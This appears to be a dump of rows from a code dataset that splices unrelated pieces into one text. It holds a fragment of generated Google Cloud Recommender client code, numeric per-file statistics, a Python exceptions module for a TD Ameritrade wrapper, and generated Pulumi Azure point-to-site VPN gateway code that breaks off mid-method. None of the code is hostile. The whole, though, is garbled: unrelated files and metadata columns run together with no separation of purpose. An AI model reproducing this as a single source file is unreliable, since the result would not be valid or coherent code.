global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Insight) The response message.
"""
config = self.GetMethodConfig('MarkDismissed')
return self._RunMethod(
config, request, global_params=global_params)
MarkDismissed.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/projects/{projectsId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}:markDismissed',
http_method='POST',
method_id='recommender.projects.locations.insightTypes.insights.markDismissed',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markDismissed',
request_field='googleCloudRecommenderV1alpha2MarkInsightDismissedRequest',
request_type_name='RecommenderProjectsLocationsInsightTypesInsightsMarkDismissedRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Insight',
supports_download=False,
)
class ProjectsLocationsInsightTypesService(base_api.BaseApiService):
"""Service class for the projects_locations_insightTypes resource."""
_NAME = 'projects_locations_insightTypes'
def __init__(self, client):
super(RecommenderV1alpha2.ProjectsLocationsInsightTypesService, self).__init__(client)
self._upload_configs = {
}
class ProjectsLocationsRecommendersConfigService(base_api.BaseApiService):
"""Service class for the projects_locations_recommenders_config resource."""
_NAME = 'projects_locations_recommenders_config'
def __init__(self, client):
super(RecommenderV1alpha2.ProjectsLocationsRecommendersConfigService, self).__init__(client)
self._upload_configs = {
}
def Commit(self, request, global_params=None):
r"""Commits a Recommender Config change.
Args:
request: (GoogleCloudRecommenderV1alpha2RecommenderConfig) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2RecommenderConfig) The response message.
"""
config = self.GetMethodConfig('Commit')
return self._RunMethod(
config, request, global_params=global_params)
Commit.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/projects/{projectsId}/locations/{locationsId}/recommenders/{recommendersId}/config:commit',
http_method='POST',
method_id='recommender.projects.locations.recommenders.config.commit',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:commit',
request_field='<request>',
request_type_name='GoogleCloudRecommenderV1alpha2RecommenderConfig',
response_type_name='GoogleCloudRecommenderV1alpha2RecommenderConfig',
supports_download=False,
)
class ProjectsLocationsRecommendersRecommendationsService(base_api.BaseApiService):
"""Service class for the projects_locations_recommenders_recommendations resource."""
_NAME = 'projects_locations_recommenders_recommendations'
def __init__(self, client):
super(RecommenderV1alpha2.ProjectsLocationsRecommendersRecommendationsService, self).__init__(client)
self._upload_configs = {
}
def Get(self, request, global_params=None):
r"""Gets the requested recommendation. Requires the recommender.*.get IAM permission for the specified recommender.
Args:
request: (RecommenderProjectsLocationsRecommendersRecommendationsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/projects/{projectsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}',
http_method='GET',
method_id='recommender.projects.locations.recommenders.recommendations.get',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}',
request_field='',
request_type_name='RecommenderProjectsLocationsRecommendersRecommendationsGetRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
def List(self, request, global_params=None):
r"""Lists recommendations for the specified Cloud Resource. Requires the recommender.*.list IAM permission for the specified recommender.
Args:
request: (RecommenderProjectsLocationsRecommendersRecommendationsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2ListRecommendationsResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/projects/{projectsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations',
http_method='GET',
method_id='recommender.projects.locations.recommenders.recommendations.list',
ordered_params=['parent'],
path_params=['parent'],
query_params=['filter', 'pageSize', 'pageToken'],
relative_path='v1alpha2/{+parent}/recommendations',
request_field='',
request_type_name='RecommenderProjectsLocationsRecommendersRecommendationsListRequest',
response_type_name='GoogleCloudRecommenderV1alpha2ListRecommendationsResponse',
supports_download=False,
)
def MarkActive(self, request, global_params=None):
r"""Mark the Recommendation State as Active. Users can use this method to indicate to the Recommender API that a DISMISSED recommendation has to be marked back as ACTIVE. MarkRecommendationActive can be applied to recommendations in DISMISSED state. Requires the recommender.*.update IAM permission for the specified recommender.
Args:
request: (RecommenderProjectsLocationsRecommendersRecommendationsMarkActiveRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('MarkActive')
return self._RunMethod(
config, request, global_params=global_params)
MarkActive.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/projects/{projectsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markActive',
http_method='POST',
method_id='recommender.projects.locations.recommenders.recommendations.markActive',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markActive',
request_field='googleCloudRecommenderV1alpha2MarkRecommendationActiveRequest',
request_type_name='RecommenderProjectsLocationsRecommendersRecommendationsMarkActiveRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
def MarkClaimed(self, request, global_params=None):
r"""Marks the Recommendation State as Claimed. Users can use this method to indicate to the Recommender API that they are starting to apply the recommendation themselves. This stops the recommendation content from being updated. Associated insights are frozen and placed in the ACCEPTED state. MarkRecommendationClaimed can be applied to recommendations in CLAIMED or ACTIVE state. Requires the recommender.*.update IAM permission for the specified recommender.
Args:
request: (RecommenderProjectsLocationsRecommendersRecommendationsMarkClaimedRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('MarkClaimed')
return self._RunMethod(
config, request, global_params=global_params)
MarkClaimed.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/projects/{projectsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markClaimed',
http_method='POST',
method_id='recommender.projects.locations.recommenders.recommendations.markClaimed',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markClaimed',
request_field='googleCloudRecommenderV1alpha2MarkRecommendationClaimedRequest',
request_type_name='RecommenderProjectsLocationsRecommendersRecommendationsMarkClaimedRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
def MarkDismissed(self, request, global_params=None):
r"""Mark the Recommendation State as Dismissed. Users can use this method to indicate to the Recommender API that an ACTIVE recommendation has to be marked back as DISMISSED. MarkRecommendationDismissed can be applied to recommendations in ACTIVE state. Requires the recommender.*.update IAM permission for the specified recommender.
Args:
request: (RecommenderProjectsLocationsRecommendersRecommendationsMarkDismissedRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('MarkDismissed')
return self._RunMethod(
config, request, global_params=global_params)
MarkDismissed.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/projects/{projectsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markDismissed',
http_method='POST',
method_id='recommender.projects.locations.recommenders.recommendations.markDismissed',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markDismissed',
request_field='googleCloudRecommenderV1alpha2MarkRecommendationDismissedRequest',
request_type_name='RecommenderProjectsLocationsRecommendersRecommendationsMarkDismissedRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
def MarkFailed(self, request, global_params=None):
r"""Marks the Recommendation State as Failed. Users can use this method to indicate to the Recommender API that they have applied the recommendation themselves, and the operation failed. This stops the recommendation content from being updated. Associated insights are frozen and placed in the ACCEPTED state. MarkRecommendationFailed can be applied to recommendations in ACTIVE, CLAIMED, SUCCEEDED, or FAILED state. Requires the recommender.*.update IAM permission for the specified recommender.
Args:
request: (RecommenderProjectsLocationsRecommendersRecommendationsMarkFailedRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('MarkFailed')
return self._RunMethod(
config, request, global_params=global_params)
MarkFailed.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/projects/{projectsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markFailed',
http_method='POST',
method_id='recommender.projects.locations.recommenders.recommendations.markFailed',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markFailed',
request_field='googleCloudRecommenderV1alpha2MarkRecommendationFailedRequest',
request_type_name='RecommenderProjectsLocationsRecommendersRecommendationsMarkFailedRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
def MarkSucceeded(self, request, global_params=None):
r"""Marks the Recommendation State as Succeeded. Users can use this method to indicate to the Recommender API that they have applied the recommendation themselves, and the operation was successful. This stops the recommendation content from being updated. Associated insights are frozen and placed in the ACCEPTED state. MarkRecommendationSucceeded can be applied to recommendations in ACTIVE, CLAIMED, SUCCEEDED, or FAILED state. Requires the recommender.*.update IAM permission for the specified recommender.
Args:
request: (RecommenderProjectsLocationsRecommendersRecommendationsMarkSucceededRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('MarkSucceeded')
return self._RunMethod(
config, request, global_params=global_params)
MarkSucceeded.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/projects/{projectsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markSucceeded',
http_method='POST',
method_id='recommender.projects.locations.recommenders.recommendations.markSucceeded',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markSucceeded',
request_field='googleCloudRecommenderV1alpha2MarkRecommendationSucceededRequest',
request_type_name='RecommenderProjectsLocationsRecommendersRecommendationsMarkSucceededRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
class ProjectsLocationsRecommendersService(base_api.BaseApiService):
"""Service class for the projects_locations_recommenders resource."""
_NAME = 'projects_locations_recommenders'
def __init__(self, client):
super(RecommenderV1alpha2.ProjectsLocationsRecommendersService, self).__init__(client)
self._upload_configs = {
}
def GetConfig(self, request, global_params=None):
r"""Gets the requested Recommender Config. There is only one instance of the config for each Recommender.
Args:
request: (RecommenderProjectsLocationsRecommendersGetConfigRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2RecommenderConfig) The response message.
"""
config = self.GetMethodConfig('GetConfig')
return self._RunMethod(
config, request, global_params=global_params)
GetConfig.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/projects/{projectsId}/locations/{locationsId}/recommenders/{recommendersId}/config',
http_method='GET',
method_id='recommender.projects.locations.recommenders.getConfig',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}',
request_field='',
request_type_name='RecommenderProjectsLocationsRecommendersGetConfigRequest',
response_type_name='GoogleCloudRecommenderV1alpha2RecommenderConfig',
supports_download=False,
)
class ProjectsLocationsService(base_api.BaseApiService):
"""Service class for the projects_locations resource."""
_NAME = 'projects_locations'
def __init__(self, client):
super(RecommenderV1alpha2.ProjectsLocationsService, self).__init__(client)
self._upload_configs = {
}
class ProjectsService(base_api.BaseApiService):
"""Service class for the projects resource."""
_NAME = 'projects'
def __init__(self, client):
super(RecommenderV1alpha2.ProjectsService, self).__init__(client)
self._upload_configs = {
}
| 53.839433
| 516
| 0.754715
| 7,993
| 91,204
| 8.420493
| 0.037783
| 0.036907
| 0.028794
| 0.017428
| 0.82294
| 0.806864
| 0.802942
| 0.792512
| 0.768412
| 0.754119
| 0
| 0.00737
| 0.165387
| 91,204
| 1,693
| 517
| 53.871234
| 0.876826
| 0.322606
| 0
| 0.630454
| 1
| 0
| 0.354835
| 0.326465
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068566
| false
| 0
| 0.002671
| 0
| 0.15049
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0d974861df4703c41ffb2b890de7b9a91b61c3ce
| 3,416
|
py
|
Python
|
algorithmic_trading/automate_finance/td_ameritrade/td/exceptions.py
|
annakoretchko/algo_trading
|
9ca1b9307c4d477888e5f2e7f6d4f57a03ca3399
|
[
"MIT"
] | 1
|
2022-01-12T14:49:52.000Z
|
2022-01-12T14:49:52.000Z
|
algorithmic_trading/automate_finance/td_ameritrade/td/exceptions.py
|
webclinic017/algo_trading-3
|
0ce3657dc7295ca6496f270f943f3e670ae199d2
|
[
"MIT"
] | null | null | null |
algorithmic_trading/automate_finance/td_ameritrade/td/exceptions.py
|
webclinic017/algo_trading-3
|
0ce3657dc7295ca6496f270f943f3e670ae199d2
|
[
"MIT"
] | 1
|
2021-09-10T17:50:44.000Z
|
2021-09-10T17:50:44.000Z
|
class TknExpError(Exception):
"""Raise exception when refresh or access token is expired.
### Arguments:
----
Exception (Exception): The base python exception class
"""
def __init__(self, message):
"""Print out message for this exception.
Arguments:
----
message (str): Pass in the message returned by the server.
"""
self.message = message
super().__init__(self.message)
class ExdLmtError(Exception):
"""Raise exception when exceeding query limit of the server.
### Arguments:
----
Exception (Exception): The base python exception class
"""
def __init__(self, message):
"""Print out message for this exception.
Arguments:
----
message (str): Pass in the message returned by the server.
"""
self.message = message
super().__init__(self.message)
class NotNulError(Exception):
"""Raise exception when a null value is passed into non-null field.
### Arguments:
----
Exception (Exception): The base python exception class
"""
def __init__(self, message):
"""Print out message for this exception.
Arguments:
----
message (str): Pass in the message returned by the server.
"""
self.message = message
super().__init__(self.message)
class ForbidError(Exception):
"""Raise forbidden exception. This usually occurs when the app does
not have access to the account.
### Arguments:
----
Exception (Exception): The base python exception class
"""
def __init__(self, message):
"""Print out message for this exception.
Arguments:
----
message (str): Pass in the message returned by the server.
"""
self.message = message
super().__init__(self.message)
class NotFndError(Exception):
"""Raise exception when criteria is not found.
### Arguments:
----
Exception (Exception): The base python exception class
"""
def __init__(self, message):
"""Print out message for this exception.
Arguments:
----
message (str): Pass in the message returned by the server.
"""
self.message = message
super().__init__(self.message)
class ServerError(Exception):
"""Raise exception when there is an error with the service or the server
cannot provide response.
### Arguments:
----
Exception (Exception): The base python exception class
"""
def __init__(self, message):
"""Print out message for this exception.
Arguments:
----
message (str): Pass in the message returned by the server.
"""
self.message = message
super().__init__(self.message)
class GeneralError(Exception):
"""Raise exception for all other status code >400 errors which are not
defined above.
### Arguments:
----
Exception (Exception): The base python exception class
"""
def __init__(self, message):
"""Print out message for this exception.
Arguments:
----
message (str): Pass in the message returned by the server.
"""
self.message = message
super().__init__(self.message)
| 28.231405
| 77
| 0.586651
| 356
| 3,416
| 5.47191
| 0.213483
| 0.118583
| 0.107803
| 0.107803
| 0.716119
| 0.716119
| 0.716119
| 0.716119
| 0.716119
| 0.716119
| 0
| 0.001277
| 0.312061
| 3,416
| 121
| 78
| 28.231405
| 0.82766
| 0.535129
| 0
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0daea7c405852d13f94bc96d5912c5fef84caeb3
| 189
|
py
|
Python
|
src/model/__init__.py
|
0shimax/Pytorch-DRN
|
a5e70784d0097069e9e1cf958a446f819dbdb7f1
|
[
"MIT"
] | null | null | null |
src/model/__init__.py
|
0shimax/Pytorch-DRN
|
a5e70784d0097069e9e1cf958a446f819dbdb7f1
|
[
"MIT"
] | null | null | null |
src/model/__init__.py
|
0shimax/Pytorch-DRN
|
a5e70784d0097069e9e1cf958a446f819dbdb7f1
|
[
"MIT"
] | null | null | null |
from . import ddqn
from . import ddqn_for_all
from . import agent_simple
from . import environment_for_owndata
from . import reply_memory_simple
from . import swichable_normalization
| 27
| 38
| 0.809524
| 26
| 189
| 5.576923
| 0.5
| 0.413793
| 0.193103
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.15873
| 189
| 6
| 39
| 31.5
| 0.91195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0df81ad3a9e7122a916de6be494135d1d79a179a
| 35,543
|
py
|
Python
|
sdk/python/pulumi_azure/network/point_to_point_vpn_gateway.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/network/point_to_point_vpn_gateway.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/network/point_to_point_vpn_gateway.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['PointToPointVpnGatewayArgs', 'PointToPointVpnGateway']
@pulumi.input_type
class PointToPointVpnGatewayArgs:
def __init__(__self__, *,
connection_configuration: pulumi.Input['PointToPointVpnGatewayConnectionConfigurationArgs'],
resource_group_name: pulumi.Input[str],
scale_unit: pulumi.Input[int],
virtual_hub_id: pulumi.Input[str],
vpn_server_configuration_id: pulumi.Input[str],
dns_servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a PointToPointVpnGateway resource.
:param pulumi.Input['PointToPointVpnGatewayConnectionConfigurationArgs'] connection_configuration: A `connection_configuration` block as defined below.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Point-to-Site VPN Gateway. Changing this forces a new resource to be created.
:param pulumi.Input[int] scale_unit: The [Scale Unit](https://docs.microsoft.com/en-us/azure/virtual-wan/virtual-wan-faq#what-is-a-virtual-wan-gateway-scale-unit) for this Point-to-Site VPN Gateway.
:param pulumi.Input[str] virtual_hub_id: The ID of the Virtual Hub where this Point-to-Site VPN Gateway should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] vpn_server_configuration_id: The ID of the VPN Server Configuration which this Point-to-Site VPN Gateway should use. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] dns_servers: A list of IP Addresses of DNS Servers for the Point-to-Site VPN Gateway.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the Point-to-Site VPN Gateway. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the Point-to-Site VPN Gateway.
"""
pulumi.set(__self__, "connection_configuration", connection_configuration)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "scale_unit", scale_unit)
pulumi.set(__self__, "virtual_hub_id", virtual_hub_id)
pulumi.set(__self__, "vpn_server_configuration_id", vpn_server_configuration_id)
if dns_servers is not None:
pulumi.set(__self__, "dns_servers", dns_servers)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="connectionConfiguration")
def connection_configuration(self) -> pulumi.Input['PointToPointVpnGatewayConnectionConfigurationArgs']:
"""
A `connection_configuration` block as defined below.
"""
return pulumi.get(self, "connection_configuration")
@connection_configuration.setter
def connection_configuration(self, value: pulumi.Input['PointToPointVpnGatewayConnectionConfigurationArgs']):
pulumi.set(self, "connection_configuration", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group in which to create the Point-to-Site VPN Gateway. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="scaleUnit")
def scale_unit(self) -> pulumi.Input[int]:
"""
The [Scale Unit](https://docs.microsoft.com/en-us/azure/virtual-wan/virtual-wan-faq#what-is-a-virtual-wan-gateway-scale-unit) for this Point-to-Site VPN Gateway.
"""
return pulumi.get(self, "scale_unit")
@scale_unit.setter
def scale_unit(self, value: pulumi.Input[int]):
pulumi.set(self, "scale_unit", value)
@property
@pulumi.getter(name="virtualHubId")
def virtual_hub_id(self) -> pulumi.Input[str]:
"""
The ID of the Virtual Hub where this Point-to-Site VPN Gateway should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_hub_id")
@virtual_hub_id.setter
def virtual_hub_id(self, value: pulumi.Input[str]):
pulumi.set(self, "virtual_hub_id", value)
@property
@pulumi.getter(name="vpnServerConfigurationId")
def vpn_server_configuration_id(self) -> pulumi.Input[str]:
"""
The ID of the VPN Server Configuration which this Point-to-Site VPN Gateway should use. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vpn_server_configuration_id")
@vpn_server_configuration_id.setter
def vpn_server_configuration_id(self, value: pulumi.Input[str]):
pulumi.set(self, "vpn_server_configuration_id", value)
@property
@pulumi.getter(name="dnsServers")
def dns_servers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of IP Addresses of DNS Servers for the Point-to-Site VPN Gateway.
"""
return pulumi.get(self, "dns_servers")
@dns_servers.setter
def dns_servers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "dns_servers", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Point-to-Site VPN Gateway. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the Point-to-Site VPN Gateway.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _PointToPointVpnGatewayState:
def __init__(__self__, *,
connection_configuration: Optional[pulumi.Input['PointToPointVpnGatewayConnectionConfigurationArgs']] = None,
dns_servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
scale_unit: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
virtual_hub_id: Optional[pulumi.Input[str]] = None,
vpn_server_configuration_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering PointToPointVpnGateway resources.
:param pulumi.Input['PointToPointVpnGatewayConnectionConfigurationArgs'] connection_configuration: A `connection_configuration` block as defined below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] dns_servers: A list of IP Addresses of DNS Servers for the Point-to-Site VPN Gateway.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the Point-to-Site VPN Gateway. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Point-to-Site VPN Gateway. Changing this forces a new resource to be created.
:param pulumi.Input[int] scale_unit: The [Scale Unit](https://docs.microsoft.com/en-us/azure/virtual-wan/virtual-wan-faq#what-is-a-virtual-wan-gateway-scale-unit) for this Point-to-Site VPN Gateway.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the Point-to-Site VPN Gateway.
:param pulumi.Input[str] virtual_hub_id: The ID of the Virtual Hub where this Point-to-Site VPN Gateway should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] vpn_server_configuration_id: The ID of the VPN Server Configuration which this Point-to-Site VPN Gateway should use. Changing this forces a new resource to be created.
"""
if connection_configuration is not None:
pulumi.set(__self__, "connection_configuration", connection_configuration)
if dns_servers is not None:
pulumi.set(__self__, "dns_servers", dns_servers)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if scale_unit is not None:
pulumi.set(__self__, "scale_unit", scale_unit)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if virtual_hub_id is not None:
pulumi.set(__self__, "virtual_hub_id", virtual_hub_id)
if vpn_server_configuration_id is not None:
pulumi.set(__self__, "vpn_server_configuration_id", vpn_server_configuration_id)
@property
@pulumi.getter(name="connectionConfiguration")
def connection_configuration(self) -> Optional[pulumi.Input['PointToPointVpnGatewayConnectionConfigurationArgs']]:
"""
A `connection_configuration` block as defined below.
"""
return pulumi.get(self, "connection_configuration")
@connection_configuration.setter
def connection_configuration(self, value: Optional[pulumi.Input['PointToPointVpnGatewayConnectionConfigurationArgs']]):
pulumi.set(self, "connection_configuration", value)
@property
@pulumi.getter(name="dnsServers")
def dns_servers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of IP Addresses of DNS Servers for the Point-to-Site VPN Gateway.
"""
return pulumi.get(self, "dns_servers")
@dns_servers.setter
def dns_servers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "dns_servers", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Point-to-Site VPN Gateway. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group in which to create the Point-to-Site VPN Gateway. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="scaleUnit")
def scale_unit(self) -> Optional[pulumi.Input[int]]:
"""
The [Scale Unit](https://docs.microsoft.com/en-us/azure/virtual-wan/virtual-wan-faq#what-is-a-virtual-wan-gateway-scale-unit) for this Point-to-Site VPN Gateway.
"""
return pulumi.get(self, "scale_unit")
@scale_unit.setter
def scale_unit(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "scale_unit", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the Point-to-Site VPN Gateway.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="virtualHubId")
def virtual_hub_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Hub where this Point-to-Site VPN Gateway should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_hub_id")
@virtual_hub_id.setter
def virtual_hub_id(self, value: Optional[pulumi.Input[str]]):
